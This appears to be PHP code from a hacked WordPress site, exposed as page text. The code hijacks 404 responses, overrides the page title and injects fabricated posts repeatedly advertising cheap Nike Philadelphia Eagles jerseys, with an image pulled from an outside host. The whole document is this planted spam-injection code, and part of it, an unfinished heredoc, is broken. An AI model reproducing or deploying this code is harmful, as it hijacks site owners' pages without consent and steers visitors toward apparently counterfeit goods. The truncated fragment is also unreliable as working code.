$wp->main( "" ); add_filter( 'pre_get_document_title', function( $title ){ $title="cheapest store Nike Philadelphia Eagles #91 Fletcher Cox Navy Men's Stitched NFL Limited NFC 2017 Pro Bowl Jersey"; return $title; }, 999, 1 ); function hook_nocache() { echo << code; } add_action('wp_head', 'hook_nocache',4); function kpg_f_content() { global $wp_query; if($wp_query->is_404 ) { $wp_query->found_posts = 1; $wp_query->post_count = 1; $wp_query->max_num_pages = 1; $wp_query->is_single = 1; $wp_query->is_404 = false; $wp_query->is_posts_page = 1; $wp_query->page=false; $wp_query->is_post=true; $wp_query->page=false; } } function confirm_pages( $posts ) { //do all the stuff here $posts = null; $post = new stdClass(); $post -> post_category = array('ebay'); $post->post_content = 'Cheapest Store Nike Philadelphia Eagles #91 Fletcher Cox Navy Men's Stitched NFL Limited NFC 2017 Pro Bowl Jersey

Cheapest Store Nike Philadelphia Eagles #91 Fletcher Cox Navy Men's Stitched NFL Limited NFC 2017 Pro Bowl Jersey

'; $post->post_excerpt="Cheapest Store Nike Philadelphia Eagles #91 Fletcher Cox Navy Men's Stitched NFL Limited NFC 2017 Pro Bowl Jersey"; $post->post_title = "Cheapest Store Nike Philadelphia Eagles #91 Fletcher Cox Navy Men's Stitched NFL Limited NFC 2017 Pro Bowl Jersey"; $post->post_images = "http://wpa.icu/images/bjgikc/s/cheapest-store-nike-philadelphia-eagles-91-fletcher-cox-navy-mens-stitched-nfl-limited-nfc-2017-pro-bowl-jersey.jpg"; $post->post_types = "post"; $post->comment_status = "publish"; $post->filter = 'raw'; $post->post_date = current_time( 'mysql' ); $post->post_date_gmt = current_time( 'mysql', 1 ); $posts[] = $post; return $posts; } add_action('wp', 'kpg_f_content'); add_filter( 'the_posts', 'confirm_pages' );